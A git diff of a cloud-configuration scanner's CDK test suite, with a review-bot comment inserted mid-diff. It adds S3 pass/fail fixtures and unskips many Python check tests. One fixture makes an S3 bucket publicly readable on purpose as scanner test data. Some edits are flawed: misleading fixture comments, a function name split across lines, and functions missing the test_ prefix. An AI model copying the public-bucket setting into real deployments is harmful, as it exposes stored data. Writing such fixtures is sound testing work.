+import { Bucket } from '@aws-cdk/aws-s3';
+
+// SINK
+// SINK: Vulnerability found due to S3 bucket missing block public policy
+new Bucket(stack, 'MyBucket', {
+ publicReadAccess: true, // This should be 'false' to block public policy
+});
diff --git a/cdk_integration_tests/src/typescript/S3BlockPublicPolicy/pass.ts b/cdk_integration_tests/src/typescript/S3BlockPublicPolicy/pass.ts
new file mode 100644
index 00000000000..27861a97390
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/S3BlockPublicPolicy/pass.ts
@@ -0,0 +1,11 @@
+// FINDING
+import { Bucket } from '@aws-cdk/aws-s3';
+
+// SINK
+// SINK: Vulnerability found due to S3 bucket missing block public policy
+new Bucket(stack, 'MyBucket', {
+ publicReadAccess: false, // This should be 'false' to block public policy
+});
+new Bucket(stack, 'MyBucket', {
+ random_param: false,
+});
diff --git a/cdk_integration_tests/test_checks_typescript.py b/cdk_integration_tests/test_checks_typescript.py
index 5390a1d849a..dbfe4b989b1 100644
--- a/cdk_integration_tests/test_checks_typescript.py
+++ b/cdk_integration_tests/test_checks_typescript.py
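Review bot: Both S3BlockPublicPolicy fixtures exercise `publicReadAccess`, whereas the policy name and the sibling S3BlockPublicACLs fixtures (`blockPublicAcls`) point at the block-public-access settings; in CDK the matching control on an L2 `Bucket` is `blockPublicAccess` (e.g. `BlockPublicAccess.BLOCK_ALL`), and `publicReadAccess: true` is the bucket-policy grant that setting is meant to prevent. If keying on `publicReadAccess` is a deliberate proxy for this policy, say so with a header such as `// policy treats publicReadAccess as the CDK L2 equivalent of a missing block-public-policy setting`; otherwise add a `blockPublicAccess` case to both fixtures so the native setting is covered. The second bucket in pass.ts (`random_param: false`) establishes that an absent prop is compliant, which is worth stating in the comment as well.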
@@ -13,370 +13,417 @@ def failed_checks() -> Dict[str, List[Dict[str, Any]]]:
 yield report_failed_checks
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_131_ALBDropHttpHeaders():
- run_check(check_results=failed_checks, check_id="CKV_AWS_131", policy_name="ALBDropHttpHeaders", language="typescript")
+def test_CKV_AWS_131_ALBDropHttpHeaders(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_131", policy_name="ALBDropHttpHeaders",
+ language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_2_ALBListenerHTTPS():
+def test_CKV_AWS_2_ALBListenerHTTPS(failed_checks):
 run_check(check_results=failed_checks, check_id="CKV_AWS_2", policy_name="ALBListenerHTTPS", language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
 def test_CKV_AWS_59_APIGatewayAuthorization(failed_checks):
- run_check(check_results=failed_checks, check_id="CKV_AWS_59", policy_name="APIGatewayAuthorization", language="typescript")
+ run_check(check_results=failed_checks, check_id="CKV_AWS_59", policy_name="APIGatewayAuthorization",
+ language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_76_APIGatewayAccessLogging():
- run_check(check_results=failed_checks, check_id="CKV_AWS_76", policy_name="APIGatewayAccessLogging", language="typescript")
+def test_CKV_AWS_76_APIGatewayAccessLogging(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_76", policy_name="APIGatewayAccessLogging",
+ language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_120_APIGatewayCacheEnable():
- run_check(check_results=failed_checks, check_id="CKV_AWS_120", policy_name="APIGatewayCacheEnable", language="typescript")
+def test_CKV_AWS_120_APIGatewayCacheEnable(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_120", policy_name="APIGatewayCacheEnable",
+ language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_95_APIGatewayV2AccessLogging():
- run_check(check_results=failed_checks, check_id="CKV_AWS_95", policy_name="APIGatewayV2AccessLogging", language="typescript")
+def test_CKV_AWS_95_APIGatewayV2AccessLogging(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_95", policy_name="APIGatewayV2AccessLogging",
+ language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_73_APIGatewayXray():
+def test_CKV_AWS_73_APIGatewayXray(failed_checks):
 run_check(check_results=failed_checks, check_id="CKV_AWS_73", policy_name="APIGatewayXray", language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_194_AppSyncFieldLevelLogs():
- run_check(check_results=failed_checks, check_id="CKV_AWS_194", policy_name="AppSyncFieldLevelLogs", language="typescript")
+def test_CKV_AWS_194_AppSyncFieldLevelLogs(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_194", policy_name="AppSyncFieldLevelLogs",
+ language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_193_AppSyncLogging():
+def test_CKV_AWS_193_AppSyncLogging(failed_checks):
 run_check(check_results=failed_checks, check_id="CKV_AWS_193", policy_name="AppSyncLogging", language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_82_AthenaWorkgroupConfiguration():
+def test_CKV_AWS_82_AthenaWorkgroupConfiguration(failed_checks):
 # need to wait for variable rendering in TS
- run_check(check_results=failed_checks, check_id="CKV_AWS_82", policy_name="AthenaWorkgroupConfiguration", language="typescript")
+ run_check(check_results=failed_checks, check_id="CKV_AWS_82", policy_name="AthenaWorkgroupConfiguration",
+ language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_131_AmazonMQBrokerPublicAccess():
- run_check(check_results=failed_checks, check_id="CKV_AWS_131", policy_name="AmazonMQBrokerPublicAccess", language="typescript")
+def test_CKV_AWS_131_AmazonMQBrokerPublicAccess(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_69", policy_name="AmazonMQBrokerPublicAccess",
+ language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_96_AuroraEncryption():
- run_check(check_results=failed_checks, check_id="CKV_AWS_96", policy_name="ALBDropHttpHeaders", language="typescript")
+def test_CKV_AWS_96_AuroraEncryption(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_96", policy_name="AuroraEncryption",
+ language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_166_BackupVaultEncrypted():
- run_check(check_results=failed_checks, check_id="CKV_AWS_166", policy_name="BackupVaultEncrypted", language="typescript")
+def test_CKV_AWS_166_BackupVaultEncrypted(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_166", policy_name="BackupVaultEncrypted",
+ language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_174_CloudFrontTLS12():
+def test_CKV_AWS_174_CloudFrontTLS12(failed_checks):
 run_check(check_results=failed_checks, check_id="CKV_AWS_174", policy_name="CloudFrontTLS12", language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_36_CloudTrailLogValidation():
- run_check(check_results=failed_checks, check_id="CKV_AWS_36", policy_name="CloudTrailLogValidation", language="typescript")
+def test_CKV_AWS_36_CloudTrailLogValidation(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_36", policy_name="CloudTrailLogValidation",
+ language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_20_S3PublicACLRead():
+def test_CKV_AWS_20_S3PublicACLRead(failed_checks):
 run_check(check_results=failed_checks, check_id="CKV_AWS_20", policy_name="S3PublicACLRead", language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_56_S3RestrictPublicBuckets():
- run_check(check_results=failed_checks, check_id="CKV_AWS_56", policy_name="S3RestrictPublicBuckets", language="typescript")
+def test_CKV_AWS_56_S3RestrictPublicBuckets(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_56", policy_name="S3RestrictPublicBuckets",
+ language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_149_SecretManagerSecretEncrypted():
- run_check(check_results=failed_checks, check_id="CKV_AWS_149", policy_name="S3RestrictPublicBuckets", language="typescript")
+def test_CKV_AWS_149_SecretManagerSecretEncrypted(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_149", policy_name="SecretManagerSecretEncrypted",
+ language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_23_SecurityGroupRuleDescription():
- run_check(check_results=failed_checks, check_id="CKV_AWS_23", policy_name="SecurityGroupRuleDescription", language="typescript")
+def test_CKV_AWS_23_SecurityGroupRuleDescription(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_23", policy_name="SecurityGroupRuleDescription",
+ language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_26_SNSTopicEncryption():
- run_check(check_results=failed_checks, check_id="CKV_AWS_26", policy_name="SNSTopicEncryption", language="typescript")
+def test_CKV_AWS_26_SNSTopicEncryption(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_26", policy_name="SNSTopicEncryption",
+ language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_27_SQSQueueEncryption():
- run_check(check_results=failed_checks, check_id="CKV_AWS_27", policy_name="SQSQueueEncryption", language="typescript")
+def test_CKV_AWS_27_SQSQueueEncryption(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_27", policy_name="SQSQueueEncryption",
+ language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_164_TransferServerIsPublic():
- run_check(check_results=failed_checks, check_id="CKV_AWS_164", policy_name="TransferServerIsPublic", language="typescript")
+def test_CKV_AWS_164_TransferServerIsPublic(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_164", policy_name="TransferServerIsPublic",
+ language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_123_VPCEndpointAcceptanceConfigured():
- run_check(check_results=failed_checks, check_id="CKV_AWS_123", policy_name="VPCEndpointAcceptanceConfigured", language="typescript")
+def test_CKV_AWS_123_VPCEndpointAcceptanceConfigured(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_123", policy_name="VPCEndpointAcceptanceConfigured",
+ language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_68_WAFEnabled():
+def test_CKV_AWS_68_WAFEnabled(failed_checks):
 run_check(check_results=failed_checks, check_id="CKV_AWS_68", policy_name="WAFEnabled", language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_156_WorkspaceRootVolumeEncrypted():
- run_check(check_results=failed_checks, check_id="CKV_AWS_156", policy_name="WorkspaceRootVolumeEncrypted", language="typescript")
+def test_CKV_AWS_156_WorkspaceRootVolumeEncrypted(failed_chec
ks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_156", policy_name="WorkspaceRootVolumeEncrypted",
+ language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_155_WorkspaceUserVolumeEncrypted():
- run_check(check_results=failed_checks, check_id="CKV_AWS_155", policy_name="WorkspaceUserVolumeEncrypted", language="typescript")
+def test_CKV_AWS_155_WorkspaceUserVolumeEncrypted(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_155", policy_name="WorkspaceUserVolumeEncrypted",
+ language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_88_EC2PublicIP():
+def test_CKV_AWS_88_EC2PublicIP(failed_checks):
 run_check(check_results=failed_checks, check_id="CKV_AWS_88", policy_name="EC2PublicIP", language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_163_ECRImageScanning():
+def test_CKV_AWS_163_ECRImageScanning(failed_checks):
 run_check(check_results=failed_checks, check_id="CKV_AWS_163", policy_name="ECRImageScanning", language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_51_ECRImmutableTags():
+def test_CKV_AWS_51_ECRImmutableTags(failed_checks):
 run_check(check_results=failed_checks, check_id="CKV_AWS_51", policy_name="ECRImmutableTags", language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_136_ECRRepositoryEncrypted():
+def test_CKV_AWS_136_ECRRepositoryEncrypted(failed_checks):
 run_check(check_results=failed_checks, check_id="CKV_AWS_136", policy_name="ECRRepositoryEncrypted", language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_65_ECSClusterContainerInsights():
+def test_CKV_AWS_65_ECSClusterContainerInsights(failed_checks):
 run_check(check_results=failed_checks, check_id="CKV_AWS_65", policy_name="ECSClusterContainerInsights", language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_97_ECSTaskDefinitionEFSVolumeEncryption():
- run_check(check_results=failed_checks, check_id="CKV_AWS_97", policy_name="ECSClusterContainerInsights",
+def test_CKV_AWS_97_ECSTaskDefinitionEFSVolumeEncryption(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_97", policy_name="ECSTaskDefinitionEFSVolumeEncryption",
 language="typescript")
-@pytest.mark.skip(reason="Not supported yet")
-def test_CKV_AWS_42_EFSEncryptionEnabled():
+def test_CKV_AWS_42_EFSEncryptionEnabled(failed_checks):
 run_check(check_results=failed_checks, check_id="CKV_AWS_42", policy_name="EFSEncryptionEnabled", language="typescript")
-@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_58_EKSSecretsEncryption(): +def test_CKV_AWS_58_EKSSecretsEncryption(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_58", policy_name="EKSSecretsEncryption", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_29_ElasticacheReplicationGroupEncryptionAtRest(): +def test_CKV_AWS_29_ElasticacheReplicationGroupEncryptionAtRest(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_29", policy_name="ElasticacheReplicationGroupEncryptionAtRest", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_30_ElasticacheReplicationGroupEncryptionAtTransit(): +def test_CKV_AWS_30_ElasticacheReplicationGroupEncryptionAtTransit(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_30", policy_name="ElasticacheReplicationGroupEncryptionAtTransit", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_31_ElasticacheReplicationGroupEncryptionAtTransitAuthToken(): +def test_CKV_AWS_31_ElasticacheReplicationGroupEncryptionAtTransitAuthToken(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_31", policy_name="ElasticacheReplicationGroupEncryptionAtTransitAuthToken", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_83_ElasticsearchDomainEnforceHTTPS(): +def test_CKV_AWS_83_ElasticsearchDomainEnforceHTTPS(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_83", policy_name="ElasticsearchDomainEnforceHTTPS", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_84_ElasticsearchDomainLogging(): +def test_CKV_AWS_84_ElasticsearchDomainLogging(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_84", policy_name="ElasticsearchDomainLogging", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def 
test_CKV_AWS_91_ELBAccessLogs(): - run_check(check_results=failed_checks, check_id="CKV_AWS_91", policy_name="ELBAccessLogs", language="typescript") +def test_CKV_AWS_92_ELBAccessLogs(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_92", policy_name="ELBAccessLogs", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_92_ELBv2AccessLogs(): - run_check(check_results=failed_checks, check_id="CKV_AWS_92", policy_name="ELBv2AccessLogs", language="typescript") +def test_CKV_AWS_91_ELBv2AccessLogs(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_91", policy_name="ELBv2AccessLogs", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_158_CloudWatchLogGroupKMSKey(): - run_check(check_results=failed_checks, check_id="CKV_AWS_158", policy_name="CloudWatchLogGroupKMSKey", language="typescript") +def test_CKV_AWS_158_CloudWatchLogGroupKMSKey(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_158", policy_name="CloudWatchLogGroupKMSKey", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_66_CloudWatchLogGroupRetention(): - run_check(check_results=failed_checks, check_id="CKV_AWS_66", policy_name="CloudWatchLogGroupRetention", language="typescript") +def test_CKV_AWS_66_CloudWatchLogGroupRetention(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_66", policy_name="CloudWatchLogGroupRetention", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_34_CloudfrontDistributionEncryption(): - run_check(check_results=failed_checks, check_id="CKV_AWS_34", policy_name="CloudfrontDistributionEncryption", language="typescript") +def test_CKV_AWS_34_CloudfrontDistributionEncryption(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_34", policy_name="CloudfrontDistributionEncryption", + language="typescript") 
-@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_86_CloudfrontDistributionLogging(): - run_check(check_results=failed_checks, check_id="CKV_AWS_86", policy_name="CloudfrontDistributionLogging", language="typescript") +def test_CKV_AWS_86_CloudfrontDistributionLogging(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_86", policy_name="CloudfrontDistributionLogging", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_35_CloudtrailEncryption(): - run_check(check_results=failed_checks, check_id="CKV_AWS_35", policy_name="CloudtrailEncryption", language="typescript") +def test_CKV_AWS_35_CloudtrailEncryption(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_35", policy_name="CloudtrailEncryption", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_67_CloudtrailMultiRegion(): - run_check(check_results=failed_checks, check_id="CKV_AWS_67", policy_name="CloudtrailMultiRegion", language="typescript") +def test_CKV_AWS_67_CloudtrailMultiRegion(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_67", policy_name="CloudtrailMultiRegion", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_78_CodeBuildProjectEncryption(): - run_check(check_results=failed_checks, check_id="CKV_AWS_78", policy_name="CodeBuildProjectEncryption", language="typescript") +def test_CKV_AWS_78_CodeBuildProjectEncryption(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_78", policy_name="CodeBuildProjectEncryption", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_47_DAXEncryption(): +def test_CKV_AWS_47_DAXEncryption(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_47", policy_name="DAXEncryption", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_89_DMSReplicationInstancePubliclyAccessible(): - 
run_check(check_results=failed_checks, check_id="CKV_AWS_89", policy_name="DMSReplicationInstancePubliclyAccessible", language="typescript") +def test_CKV_AWS_89_DMSReplicationInstancePubliclyAccessible(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_89", + policy_name="DMSReplicationInstancePubliclyAccessible", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_104_DocDBAuditLogs(): +def test_CKV_AWS_104_DocDBAuditLogs(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_104", policy_name="DocDBAuditLogs", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_74_DocDBEncryption(): +def test_CKV_AWS_74_DocDBEncryption(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_74", policy_name="DocDBEncryption", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_90_DocDBTLS(): +def test_CKV_AWS_90_DocDBTLS(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_90", policy_name="DocDBTLS", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_165_DynamodbGlobalTableRecovery(): - run_check(check_results=failed_checks, check_id="CKV_AWS_165", policy_name="DynamodbGlobalTableRecovery", language="typescript") +def test_CKV_AWS_165_DynamodbGlobalTableRecovery(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_165", policy_name="DynamodbGlobalTableRecovery", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_28_DynamodbRecovery(): +def test_CKV_AWS_28_DynamodbRecovery(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_28", policy_name="DynamodbRecovery", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_3_EBSEncryption(): +def test_CKV_AWS_3_EBSEncryption(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_3", policy_name="EBSEncryption", 
language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_5_ElasticsearchEncryption(): - run_check(check_results=failed_checks, check_id="CKV_AWS_5", policy_name="ElasticsearchEncryption", language="typescript") +def CKV_AWS_377_S3BucketLogging(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_377", policy_name="S3BucketLogging", + language="typescript") + + +def CKV_AWS_375_S3BucketEncryption(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_375", policy_name="S3BucketEncryption", + language="typescript") + + +def CKV_AWS_379_S3BucketVersioning(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_379", policy_name="S3BucketVersioning", + language="typescript") + + +def CKV_AWS_376_S3BucketKMSEncryption(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_376", policy_name="S3BucketKMSEncryption", + language="typescript") + + +def CKV_AWS_378_S3BucketPublicAccessBlock(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_378", policy_name="S3BucketPublicAccessBlock", + language="typescript") + + +def test_CKV_AWS_195_GlueSecurityConfigurationEnabled(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_195", policy_name="GlueSecurityConfigurationEnabled", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_6_ElasticsearchNodeToNodeEncryption(): - run_check(check_results=failed_checks, check_id="CKV_AWS_6", policy_name="ElasticsearchNodeToNodeEncryption", language="typescript") +def CKV_AWS_5_ElasticsearchEncryption(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_5", policy_name="ElasticsearchEncryption", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_94_GlueDataCatalogEncryption(): - run_check(check_results=failed_checks, check_id="CKV_AWS_94", policy_name="GlueDataCatalogEncryption", language="typescript") 
+def CKV_AWS_6_ElasticsearchNodeToNodeEncryption(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_6", policy_name="ElasticsearchNodeToNodeEncryption", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_99_GlueSecurityConfiguration(): - run_check(check_results=failed_checks, check_id="CKV_AWS_99", policy_name="GlueSecurityConfiguration", language="typescript") +def CKV_AWS_94_GlueDataCatalogEncryption(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_94", policy_name="GlueDataCatalogEncryption", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_195_GlueSecurityConfigurationEnabled(): - run_check(check_results=failed_checks, check_id="CKV_AWS_195", policy_name="GlueSecurityConfigurationEnabled", language="typescript") +def CKV_AWS_99_GlueSecurityConfiguration(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_99", policy_name="GlueSecurityConfiguration", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_40_IAMPolicyAttachedToGroupOrRoles(): - run_check(check_results=failed_checks, check_id="CKV_AWS_40", policy_name="IAMPolicyAttachedToGroupOrRoles", language="typescript") +def CKV_AWS_195_GlueSecurityConfigurationEnabled(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_195", policy_name="GlueSecurityConfigurationEnabled", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_43_KinesisStreamEncryptionType(): - run_check(check_results=failed_checks, check_id="CKV_AWS_43", policy_name="KinesisStreamEncryptionType", language="typescript") +def CKV_AWS_40_IAMPolicyAttachedToGroupOrRoles(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_40", policy_name="IAMPolicyAttachedToGroupOrRoles", + language="typescript") + +def CKV_AWS_43_KinesisStreamEncryptionType(failed_checks): + run_check(check_results=failed_checks, 
check_id="CKV_AWS_43", policy_name="KinesisStreamEncryptionType", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_116_LambdaDLQConfigured(): - run_check(check_results=failed_checks, check_id="CKV_AWS_116", policy_name="LambdaDLQConfigured", language="typescript") + +def CKV_AWS_116_LambdaDLQConfigured(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_116", policy_name="LambdaDLQConfigured", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_45_LambdaEnvironmentCredentials(): - run_check(check_results=failed_checks, check_id="CKV_AWS_45", policy_name="LambdaEnvironmentCredentials", language="typescript") +def CKV_AWS_45_LambdaEnvironmentCredentials(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_45", policy_name="LambdaEnvironmentCredentials", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_173_LambdaEnvironmentEncryptionSettings(): - run_check(check_results=failed_checks, check_id="CKV_AWS_173", policy_name="LambdaEnvironmentEncryptionSettings", language="typescript") +def CKV_AWS_173_LambdaEnvironmentEncryptionSettings(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_173", policy_name="LambdaEnvironmentEncryptionSettings", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_115_LambdaFunctionLevelConcurrentExecutionLimit(): - run_check(check_results=failed_checks, check_id="CKV_AWS_115", policy_name="LambdaFunctionLevelConcurrentExecutionLimit", language="typescript") +def CKV_AWS_115_LambdaFunctionLevelConcurrentExecutionLimit(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_115", + policy_name="LambdaFunctionLevelConcurrentExecutionLimit", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_117_LambdaInVPC(): +def CKV_AWS_117_LambdaInVPC(failed_checks): run_check(check_results=failed_checks, 
check_id="CKV_AWS_117", policy_name="LambdaInVPC", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_8_LaunchConfigurationEBSEncryption(): - run_check(check_results=failed_checks, check_id="CKV_AWS_8", policy_name="LaunchConfigurationEBSEncryption", language="typescript") +def CKV_AWS_8_LaunchConfigurationEBSEncryption(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_8", policy_name="LaunchConfigurationEBSEncryption", + language="typescript") + +def CKV_AWS_44_NeptuneClusterStorageEncrypted(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_44", policy_name="NeptuneClusterStorageEncrypted", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_44_NeptuneClusterStorageEncrypted(): - run_check(check_results=failed_checks, check_id="CKV_AWS_44", policy_name="NeptuneClusterStorageEncrypted", language="typescript") +def CKV_AWS_118_RDSEnhancedMonitorEnabled(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_118", policy_name="RDSEnhancedMonitorEnabled", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_118_RDSEnhancedMonitorEnabled(): - run_check(check_results=failed_checks, check_id="CKV_AWS_118", policy_name="RDSEnhancedMonitorEnabled", language="typescript") + +def CKV_AWS_366_RDSMultiAZEnabled(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_366", policy_name="RDSMultiAZEnabled", + language="typescript") + + +def CKV_AWS_367_RDSPubliclyAccessible(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_367", policy_name="RDSPubliclyAccessible", + language="typescript") + + +def CKV_AWS_369_RedShiftSSL(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_369", policy_name="RedShiftSSL", + language="typescript") + + +def CKV_AWS_368_RedshiftClusterEncryption(failed_checks): + run_check(check_results=failed_checks, 
check_id="CKV_AWS_368", policy_name="RedshiftClusterEncryption", + language="typescript") + + +def CKV_AWS_370_RedshiftClusterLogging(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_370", policy_name="RedshiftClusterLogging", + language="typescript") + + +def CKV_AWS_371_RedshiftClusterPubliclyAccessible(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_371", policy_name="RedshiftClusterPubliclyAccessible", + language="typescript") + + +def CKV_AWS_372_RedshiftInEc2ClassicMode(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_372", policy_name="RedshiftInEc2ClassicMode", + language="typescript") + + +def CKV_AWS_373_S3BlockPublicACLs(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_373", policy_name="S3BlockPublicACLs", + language="typescript") + + +def CKV_AWS_374_S3BlockPublicPolicy(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_374", policy_name="S3BlockPublicPolicy", + language="typescript") diff --git a/cdk_integration_tests/utils.py b/cdk_integration_tests/utils.py index 666b7e8f121..ce76b44c669 100644 --- a/cdk_integration_tests/utils.py +++ b/cdk_integration_tests/utils.py 
